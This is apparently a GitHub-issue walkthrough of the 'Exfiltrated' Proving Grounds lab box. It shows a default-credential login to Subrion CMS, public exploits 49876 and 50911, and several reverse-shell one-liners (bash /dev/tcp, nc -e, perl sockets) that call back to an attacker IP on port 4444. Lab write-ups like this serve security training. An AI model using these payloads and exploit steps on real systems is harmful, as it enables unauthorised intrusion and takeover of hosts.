search

WDavid404 / PG-Box

PG box workthough note
0 stars 0 forks source link

Exfiltrated (easy) #9

Open WDavid404 opened 4 months ago

WDavid404 commented 4 months ago

Key points:

WDavid404 commented 4 months ago 
22/tcp open  ssh     syn-ack ttl 61 OpenSSH 8.2p1 Ubuntu 4ubuntu0.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    syn-ack ttl 61 Apache httpd 2.4.41 ((Ubuntu))
-- http-title: Did not follow redirect to http://exfiltrated.offsec/

sudo vi /etc/hosts --> add exfiltrated.offsec

see the source code of web page --> Subrion 4.2 image

and from the page (/panel), we can know version is 4.2.1 image

Try admin/admin login to http://exfiltrated.offsec/panel --> succeed

searchsploit Subrion 4.2 --> 49876.py

Try python3 49876.py -u http://exfiltrated.offsec/panel/ -l admin -p admin --> it work (Note: URL must be '/panle/' --> '/panle' doesn't work )

Try reverse shell command refer to https://www.revshells.com/

bash -c 'bash -i >& /dev/tcp/192.168.45.192/4444 0>&1'
nc -e /bin/bash 192.168.45.192 4444
perl -e 'use Socket;$i="192.168.45.192";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};'

---> didn't work

Try 'perl no sh' perl -MIO -e '$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.45.192:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;' --> it works.

upgrade the shell: python3 -c 'import pty;pty.spawn("/bin/bash")'; export TERM=xterm-256color cat /etc/crontab --> image

cat image-exif.sh -->

#! /bin/bash
#07/06/18 A BASH script to collect EXIF metadata 

echo -ne "\\n metadata directory cleaned! \\n\\n"

IMAGES='/var/www/html/subrion/uploads'

META='/opt/metadata'
FILE=`openssl rand -hex 5`
LOGFILE="$META/$FILE"

echo -ne "\\n Processing EXIF metadata now... \\n\\n"
ls $IMAGES | grep "jpg" | while read filename; 
do 
    exiftool "$IMAGES/$filename" >> $LOGFILE                   <---import!!
done

echo -ne "\\n\\n Processing is finished! \\n\\n\\n"

The key point is "exiftool "$IMAGES/$filename" >> $LOGFILE" command. Search 'exiftool exploit' in google --> https://www.exploit-db.com/exploits/50911

sudo apt update
sudo apt install djvulibre-bin
python3 50911.py -s 192.168.45.192 4444

--> image

Upload image.jpg to /var/www/html/subrion/uploads www-data@exfiltrated:/var/www/html/subrion/uploads$ wget 192.168.45.192/image.jpg

Get a reverse shell from the target host image